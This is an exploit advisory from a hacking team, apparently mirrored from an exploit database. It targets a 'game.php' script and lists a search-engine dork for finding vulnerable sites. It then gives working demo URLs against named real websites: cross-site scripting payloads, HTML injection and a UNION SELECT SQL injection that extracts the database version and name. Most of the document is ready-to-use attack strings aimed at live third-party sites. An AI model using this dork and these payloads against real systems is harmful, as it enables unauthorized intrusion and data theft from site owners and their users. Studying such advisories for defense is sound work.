Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23945
HistoryMay 28, 2010 - 12:00 a.m.

Web Online Games (game.php) Multiple Vulnerabilities

2010-05-2800:00:00
vulners.com
399

====================================================
Web Online Games (game.php) Multiple Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \/
/\ \ /' _ `\ \/\ \/
/
\< /'
\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \
/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \
\\ \/\ \\ 0
0 \/
/\/
/\/
/\ \\ \/
/ \// \// \// \// 1
1 \ \
/ >> Exploit database separated by exploit 0
0 \/
/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm XroGuE member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

########################################################################

Name: Web Online Games (game.php) Multiple Vulnerabilities

Vendor: N/A

Date: 2010-05-28

Author: XroGuE

Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !

Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com

Home: (-_+)

########################################################################

[+] Dork: inurl:"game.php?id="

[+] Vulnerabilities:

      http://[target]/[path]/game.php?id=[SQL/XSS/HTML]

[+] XSS InjecTion Vulnerability:

[+] Demo: http://www.biclopsgames.com/game.php?id=&lt;script&gt;alert&#40;/XroGuE/&#41;;&lt;/script&gt;
http://www.xplored.com/play/game.php?ID=&quot;&lt;script&gt;alert&#40;/XroGuE/&#41;;&lt;/script&gt;

########################################################################

[+] HTML InjecTion Vulnerability:

[+] Demo: http://www.biclopsgames.com/game.php?id=&lt;marquee&gt;&lt;font color=Blue size=15>XroGuE</font></marquee>
http://www.xplored.com/play/game.php?ID=&quot;&lt;marquee&gt;&lt;font color=Blue size=15>XroGuE</font></marquee>

########################################################################

[+] SQL InjecTion Vulnerability:

[+] Demo: http://www.xplored.com/play/game.php?ID=1+UNION+SELECT+1,2,3,4,version&#40;&#41;,6,7,8,9,database&#40;&#41;--

########################################################################

Inj3ct0r.com [2010-05-28]